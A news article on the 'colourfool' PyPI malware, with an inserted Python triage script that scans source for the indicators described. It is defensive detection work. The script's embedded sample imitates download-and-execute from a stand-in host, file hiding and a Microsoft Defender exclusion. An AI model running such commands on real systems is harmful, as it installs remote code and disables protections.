Frankenstein malware stitched together from code of others disguised as PyPI package
Crime-as-a-service vendors mix and match components as needed by client
A malicious package discovered in the Python Package Index (PyPI) is the latest example of what threat hunters from Kroll called the continued "democratization of cybercrime," with the bad guys creating malware variants from the code of others.
It reflects the as-a-service trend in ransomware, distributed denial-of-service (DDoS), and other malware, which lets crooks with little or no skill lease or buy weapons to launch their own attacks. In this case, it means pulling together code from multiple sources to build the malware in packages uploaded to PyPI.
Dropping malicious packages into PyPI, GitHub, NPM, RubyGems, and other repositories, and enticing developers to inadvertently pull them into their products, is a fast-growing class of attack on the software supply chain.
Kroll researchers, who developed a tool to better monitor PyPI for malicious packages, discovered one called "colourfool" that they dubbed "Colour-Blind."
The package came with full-featured information stealer and remote access trojan (RAT) capabilities written in Python. It contained a single "suspiciously large" Python file with a function whose only purpose was to download a file from the internet, hide it from the user, and execute it.
"The function, therefore, immediately seemed suspicious and likely malicious," researchers Dave Truman and George Glass wrote in a report Thursday.
There was a range of other indicators of suspicious activity, including the use of a hardcoded URL for downloading resources from the internet. The downloaded file contained a Python script, code.py, with info-stealing functions, including keylogging and cookie theft.
The RAT came with a range of capabilities, such as collecting passwords, terminating applications, taking screenshots of the user's desktop, looking up the victim's IP information and displaying it on the screen, stealing cryptocurrency wallet information, and spying on the user via a webcam.
Cobbling the code together
Truman and Glass described some of the code within the file as "blatantly malicious," and gave as one example a function designed to get past antivirus software by adding the malware's own location to the exclusion list of Microsoft Defender Antivirus on Windows.
Other parts of the code showed a weak attempt at obfuscation: essentially variable names following a simple pattern of just two characters.
All of this convinced the Kroll researchers that they were likely dealing with malware made up of parts derived from others.
"The combination of obfuscation alongside blatant malicious code indicates that it is unlikely that all the code was developed by a single entity," they wrote. "It is possible that the final developer mostly utilized other people's code, adding it via copy and paste."
Another indication was that the malware included a function to determine whether it is running inside a virtual machine, and another to check whether security research tools are running on the system. Such evasive behavior is usually seen when the attacker wants to avoid having the malware run inside an automated analysis sandbox, which could tag it as malicious.
"In this case, however, after the malware gets the information, it does nothing with most of it," they wrote. "For example, the result from the security research tool search is never referenced or checked. This behavior adds strength to the hypothesis that the code has been plagiarized from multiple sources, and the final developer might not be particularly sophisticated in their methods."
The malware also includes an embedded "Snake" game that was likely copied directly from a GitHub repository and doesn't seem to serve any purpose, another proof point of the irregular sourcing of the code.
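As an added illustration for this article, not Kroll's monitoring tool and not code from the colourfool package: a small heuristic triage script that walks a Python file's syntax tree and flags the kinds of indicators the researchers describe above. It scans a constructed stand-in source that imitates the described behaviour (download from a hardcoded URL, hide and execute the file, a Defender exclusion added via the PowerShell cmdlet Add-MpPreference -ExclusionPath, two-letter identifiers, and a VM check whose result is thrown away). The marker strings, the two-letter-name threshold and the verdict cutoff are the editor's assumptions, chosen for the example.

```python
"""Heuristic triage of a Python source file for the indicators described above.

Editor's example; the sample below is constructed and is NOT the real package.
"""
import ast
import re

URL_RE = re.compile(r"https?://[^\s'\"]+")
DOWNLOAD_CALLS = {"urllib.request.urlopen", "urllib.request.urlretrieve",
                  "requests.get", "requests.post"}
EXEC_CALLS = {"os.system", "os.popen", "os.startfile", "subprocess.run",
              "subprocess.call", "subprocess.Popen", "subprocess.check_output",
              "exec", "eval"}
DEFENDER_MARKERS = ("Add-MpPreference", "ExclusionPath")          # assumed marker strings
VM_MARKERS = ("vmware", "virtualbox", "vbox", "qemu", "hyper-v", "sandbox")
RESEARCH_TOOL_MARKERS = ("wireshark", "procmon", "x64dbg", "fiddler", "ollydbg")

# Constructed sample imitating the described behaviour (TEST-NET address, not a real host).
SAMPLE = '''
import os, subprocess, urllib.request

def aa():
    xx = urllib.request.urlopen("http://203.0.113.10/dl/code.py").read()
    with open("code.py", "wb") as ff:
        ff.write(xx)
    os.system("attrib +h code.py")
    subprocess.call(["python", "code.py"])

def bb():
    subprocess.run(["powershell", "Add-MpPreference", "-ExclusionPath", os.getcwd()])

def cc():
    return "VMware" in os.popen("wmic computersystem get model").read()

cc()
aa()
'''


def _dotted(node):
    """Return 'a.b.c' for an Attribute/Name chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def triage(source):
    """Return {'findings': [...], 'score': n} for one Python source string."""
    tree = ast.parse(source)
    findings = []
    strings = [n.value for n in ast.walk(tree)
               if isinstance(n, ast.Constant) and isinstance(n.value, str)]
    lowered = [s.lower() for s in strings]

    # Hardcoded URLs used to fetch a second stage.
    urls = sorted({u for s in strings for u in URL_RE.findall(s)})
    if urls:
        findings.append(f"hardcoded URL(s): {', '.join(urls)}")

    # Download primitive plus an execution primitive in the same file.
    calls = [c for c in (_dotted(n.func) for n in ast.walk(tree) if isinstance(n, ast.Call)) if c]
    downloads = sorted({c for c in calls if c in DOWNLOAD_CALLS})
    execs = sorted({c for c in calls if c in EXEC_CALLS})
    if downloads and execs:
        findings.append(f"download-and-execute: {downloads} -> {execs}")

    if any("attrib" in s and "+h" in s for s in strings):
        findings.append("hides a file with attrib +h")
    if any(m in s for s in strings for m in DEFENDER_MARKERS):
        findings.append("adds a Microsoft Defender exclusion path")
    if any(m in s for s in lowered for m in VM_MARKERS):
        findings.append("virtual machine detection strings")
    if any(m in s for s in lowered for m in RESEARCH_TOOL_MARKERS):
        findings.append("security research tool names")

    # Weak obfuscation: most names the file itself defines are two letters long.
    defined = set()
    for n in ast.walk(tree):
        if isinstance(n, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            defined.add(n.name)
        elif isinstance(n, ast.arg):
            defined.add(n.arg)
        elif isinstance(n, ast.Name) and isinstance(n.ctx, ast.Store):
            defined.add(n.id)
    short = {nm for nm in defined if len(nm) == 2 and nm.isalpha()}
    if defined and len(short) / len(defined) >= 0.5:
        findings.append(f"weak obfuscation: {len(short)}/{len(defined)} defined names are two letters")

    # Evasion check called as a bare statement, so its result is never used.
    local_funcs = {n.name: n for n in ast.walk(tree) if isinstance(n, ast.FunctionDef)}
    for stmt in ast.walk(tree):
        if isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call):
            fn = local_funcs.get(_dotted(stmt.value.func))
            if fn is None:
                continue
            fn_strings = [c.value.lower() for c in ast.walk(fn)
                          if isinstance(c, ast.Constant) and isinstance(c.value, str)]
            if any(m in s for s in fn_strings for m in VM_MARKERS + RESEARCH_TOOL_MARKERS):
                findings.append(f"evasion check {fn.name}() called but its result is discarded")

    return {"findings": findings, "score": len(findings)}


def verdict(source, threshold=3):
    """Assumed cutoff: three or more independent indicators is worth a human look."""
    return "review" if triage(source)["score"] >= threshold else "pass"


if __name__ == "__main__":
    for finding in triage(SAMPLE)["findings"]:
        print("-", finding)
    print("verdict:", verdict(SAMPLE))
```

Any one of these signals occurs in benign code too (installers download things, build scripts shell out), which is why the script counts independent indicators rather than alerting on a single match; a real PyPI monitor would also compare the package against the author's other uploads and the project's declared purpose before raising a ticket.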
For Mike Parkin, senior technical engineer for Vulcan Cyber, what Kroll found was less about the "democratization" of cybercrime and more the "commoditization" of it.
"Threat actors have been adapting their business models for a while and they are already at the point where they offer crime-as-a-service on the dark web and have brokers who can mix and match attack components to meet a client's specific needs," Parkin told The Register.
Attacks on code repositories will also continue, he said, because they give miscreants an easier path to get their malicious packages in front of developers.
"They're skipping several steps in the attack chain by having the target do a large part of the work for them," he said. "That makes them an especially inviting target, and we can expect threat actors to stay with this approach until the repos deploy defenses to stop it … When those holes are closed, the attackers will find new ones." ®